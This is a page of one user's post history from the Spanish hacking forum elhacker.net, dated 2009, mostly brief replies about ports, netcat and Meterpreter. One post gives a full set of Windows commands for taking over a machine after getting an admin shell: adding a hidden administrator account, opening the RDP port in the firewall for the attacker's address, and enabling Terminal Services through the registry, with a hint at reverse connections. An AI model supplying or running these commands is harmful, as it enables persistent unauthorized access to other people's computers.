elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Mensajes
Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 55
371  Seguridad Informática / Hacking / Re: Acceso Remoto (habilitarlo por CMD) en: 25 Noviembre 2009, 13:03 pm
bueno, vas en el buen camino, vamos a suponer que has conseguido una shell con privilegios de admin, los pasos que más o menos debes seguir para conseguir acceso a escritorio remoto:

Primero , vamos a crearnos un usuario (ANTiSPY:ANTiSPY) y lo vamos a meter en el grupo "Administradores" y "Usuarios de escritorio remoto", para que podamos entrar por RDP y desde ahí tener todos los privilegios que podamos necesitar sobre la máquina

Código:
>net user ANTiSPY ANTiSPY /add
Código:
>net localgroup Administradores ANTiSPY /add
Código:
>net localgroup "Usuarios de escritorio remoto" ANTiSPY /add


Ahora, es posible que tengamos filtrado el puerto de Terminal Server (3389/TCP), para comprobarlo bastará con un simple escaneo con NMap...
Si es así, vamos a tener que desactivar el firewall, o mejor aún, crear una excepción para nuestra IP de origen, así sólo nosotros tendremos acceso al Terminal Server y nadie más podrá aprovechar nuestro trabajo para entrar en la máquina:

Código:
>netsh firewall add portopening protocol = TCP port = 3389 name = RDP mode = ENABLE scope = CUSTOM addresses = xx.xx.xx.xx


Si ahora hacemos un nuevo escaneo, veremos que...el puerto ha pasado de filtrado a cerrado, eso quiere decir que el firewall ha sido desactivado correctamente, aunque seguimos sin poder conectar porque no hay un servicio a la escucha. Esto es debido a que hay que modificar una clave de registro (en los Windows XP al menos, supongo que en los Server será parecido, pero no te lo aseguro) para poder activar la administración remota. Hagámoslo:

Código:
>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


ya solo tenemos que acceder y probar la contraseña que hemos configurado a ver si todo el proceso anterior ha surtido efecto:

Código:
# rdesktop xx.xx.xx.xx


Este proceso tiene algunas "pegas", la principal es que puede haber más firewalls en el sistema (firewalls en la red, no en el mismo sistema), la solución sería fácil, hacer una conexión inversa y que sea el Sistema el que se conecte con nosotros...
372  Seguridad Informática / Hacking / Re: Preguntas netcat en: 25 Noviembre 2009, 12:43 pm
ya te dije, sólo con tener el Pc encendido ya estás expuesto :P, ahora, dependiendo del grado de exposición al exterior, este riesgo aumenta o disminuye
373  Seguridad Informática / Hacking / Re: Preguntas netcat en: 25 Noviembre 2009, 02:57 am
cualquier puerto es un posible punto de entrada sí, no hay nada 100% seguro, así que si expones tu Pc al exterior, ya lo estás exponiendo a posibles ataques.
obviamente, cuantos más servicios brindes más posibilidades, cuanto más complejo sea el software que brinda esos servicios más posibilidades,y así sucesivamente...

no hay infinidad de puertos posibles, pero si unos cuantos, los suficientes como para no usarlos todos ni de coña!
374  Seguridad Informática / Hacking / Re: Diccionarios para fuzzing de DNS en: 24 Noviembre 2009, 15:07 pm
desde consola, un ejemplo:

Código:
antonio@hack4free:~$ echo "a b c "
a b c
antonio@hack4free:~$ echo "a b c " | sed "s/ /\\n/g"
a
b
c
375  Foros Generales / Dudas Generales / Re: arrancar una ISO cualquiera desde USB en: 23 Noviembre 2009, 22:07 pm
muy bueno, la pena es que es sólo para sistemas linux
376  Seguridad Informática / Nivel Web / Re: Hackea a Elhacker.net ! en: 23 Noviembre 2009, 16:05 pm
si es lo que yo pienso, es en el foro, primera pista dada...  :-X
377  Seguridad Informática / Nivel Web / Re: Especial Navidad 2009 (en construcción) en: 22 Noviembre 2009, 23:03 pm
muy bueno WHK  :rolleyes: ::)
378  Seguridad Informática / Hacking / Re: Sobre Windows vista en: 21 Noviembre 2009, 17:39 pm
bifrost,poison ivy no son keyloggers...  :-\

http://www.brothersoft.com/windows-vista-keylogger-133563.html
379  Seguridad Informática / Hacking / Re: [Mini How-To] Usando Meterpreter en: 20 Noviembre 2009, 20:13 pm
gracias por el apoyo

bueno, tengo/tenemos otras cosas en mente para hacer, y el metasploit es un mundo, pero si que quizás me planté el ir soltando mini manuales con cosas especificas como esta   :silbar:

salu2
380  Seguridad Informática / Hacking / Re: Problema con scanner en: 20 Noviembre 2009, 19:24 pm
Bueno, cuando abres un puerto y lo pones a la escucha, puedes elegir desde que interfaces recibir el tráfico y desde cuales no
Páginas: 1 ... 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 [38] 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 ... 55
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines